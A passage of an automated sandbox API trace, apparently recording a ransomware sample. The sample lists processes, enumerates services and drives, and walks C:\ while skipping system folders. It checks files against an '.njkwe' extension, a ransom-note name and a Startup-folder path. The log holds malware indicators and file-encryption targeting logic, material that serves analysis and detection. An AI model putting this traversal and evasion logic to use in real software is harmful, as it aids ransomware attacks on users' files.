th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0060.224] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0060.224] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.225] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0060.225] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0060.226] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0060.226] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0060.227] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.227] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.228] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0060.228] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0060.229] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.229] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0060.230] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0060.230] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0060.231] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0060.231] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="entering.exe")) returned 1 [0060.232] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nut-d-cycles.exe")) returned 1 [0060.232] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marilyn.exe")) returned 1 [0060.233] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="twelve.exe")) returned 1 [0060.233] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="construction rhode cow.exe")) returned 1 [0060.234] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x770, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="doc mas discount.exe")) returned 1 [0060.234] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="complicated-doc.exe")) returned 1 [0060.234] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="necessity ink dramatically.exe")) returned 1 [0060.235] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="jeffrey_investors.exe")) returned 1 [0060.236] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="serial.exe")) returned 1 [0060.236] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="url.exe")) returned 1 [0060.236] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boys-pastor.exe")) returned 1 [0060.237] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="vccontinuingbless.exe")) returned 1 [0060.238] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="police-linking.exe")) returned 1 [0060.238] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bulk_relay_love.exe")) returned 1 [0060.239] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="vt_mapping.exe")) returned 1 [0060.240] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="primarilywalkforced.exe")) returned 1 [0060.240] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="summer.exe")) returned 1 [0060.241] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rankings.exe")) returned 1 [0060.242] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="needs_windsor_copyrighted.exe")) returned 1 [0060.242] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="melissa offense.exe")) returned 1 [0060.243] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hl_gis.exe")) returned 1 [0060.243] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="factory_infinite_respondent.exe")) returned 1 [0060.244] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="gratefulultrawebcam.exe")) returned 1 [0060.245] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.245] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf98, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.246] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.246] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.247] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uvulko.exe")) returned 1 [0060.247] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0060.248] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x504, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.248] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.249] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf54, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0060.249] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.250] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0060.250] CloseHandle (hObject=0x2f8) returned 1 [0060.251] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc26050 [0060.316] EnumServicesStatusExW (in: hSCManager=0xc26050, InfoLevel=0x0, dwServiceType=0x3b, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19ed48, lpServicesReturned=0x19ed4c, lpResumeHandle=0x19ed34, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19ed48, lpServicesReturned=0x19ed4c, lpResumeHandle=0x19ed34) returned 0 [0060.326] GetLastError () returned 0x5 [0060.326] CloseServiceHandle (hSCObject=0xc26050) returned 1 [0060.327] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x406268 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0060.328] GetLogicalDrives () returned 0x4 [0060.328] wnsprintfW (in: pszDest=0x19ed14, cchDest=25, pszFmt="%c:\\" | out: pszDest="C:\\") returned 3 [0060.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.328] GetProcessHeap () returned 0xbe0000 [0060.328] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x208) returned 0xc30f80 [0060.328] wnsprintfW (in: pszDest=0xc30f80, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0060.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x402640, lpParameter=0xc30f80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0060.328] WaitForMultipleObjects (nCount=0x1, lpHandles=0x19ed48*=0x2f4, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x1a4 Thread: id = 3 os_tid = 0xe98 Thread: id = 4 os_tid = 0xef4 Thread: id = 5 os_tid = 0xd34 Thread: id = 6 os_tid = 0xd38 Thread: id = 7 os_tid = 0xd4c Thread: id = 8 os_tid = 0xd54 Thread: id = 30 os_tid = 0xd48 [0060.426] GetProcessHeap () returned 0xbe0000 [0060.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc47aa0 [0060.426] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0060.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xc19720 [0060.427] lstrcmpiW (lpString1="$GetCurrent", lpString2="Windows") returned -1 [0060.427] lstrcmpiW (lpString1="$GetCurrent", lpString2="$Recycle.bin") returned -1 [0060.427] lstrcmpiW (lpString1="$GetCurrent", lpString2="System Volume Information") returned -1 [0060.427] lstrcmpiW (lpString1="$GetCurrent", lpString2="Program Files") returned -1 [0060.427] lstrcmpiW (lpString1="$GetCurrent", lpString2="Program Files (x86)") returned -1 [0060.427] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent") returned 18 [0060.427] lstrcmpW (lpString1="$GetCurrent", lpString2=".") returned -1 [0060.427] lstrcmpW (lpString1="$GetCurrent", lpString2="..") returned -1 [0060.427] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.427] GetProcessHeap () returned 0xbe0000 [0060.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0060.427] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\*") returned 20 [0060.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0060.429] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.429] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.429] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.429] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.429] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.429] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\.") returned 20 [0060.429] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.429] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0060.429] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0060.429] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0060.429] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.429] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\." (normalized: "c:\\$getcurrent\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.429] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.429] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.430] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.430] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.430] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.430] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.430] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\..") returned 21 [0060.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.430] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0060.430] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0060.430] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0060.430] StrCmpNW (lpStr1="\\\\?\\C:\\$GetCurrent\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0060.430] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.430] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Logs", cAlternateFileName="")) returned 1 [0060.430] lstrcmpiW (lpString1="Logs", lpString2="Windows") returned -1 [0060.430] lstrcmpiW (lpString1="Logs", lpString2="$Recycle.bin") returned 1 [0060.430] lstrcmpiW (lpString1="Logs", lpString2="System Volume Information") returned -1 [0060.430] lstrcmpiW (lpString1="Logs", lpString2="Program Files") returned -1 [0060.430] lstrcmpiW (lpString1="Logs", lpString2="Program Files (x86)") returned -1 [0060.430] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs") returned 23 [0060.430] lstrcmpW (lpString1="Logs", lpString2=".") returned 1 [0060.430] lstrcmpW (lpString1="Logs", lpString2="..") returned 1 [0060.430] lstrcmpW (lpString1="\\\\?\\C:\\$GetCurrent\\Logs", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.430] GetProcessHeap () returned 0xbe0000 [0060.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0060.430] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\*") returned 25 [0060.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0060.433] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.433] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.433] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.433] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.433] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.433] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$GetCurrent\\Logs\\.") returned 25 [0060.433] lstrcmpW 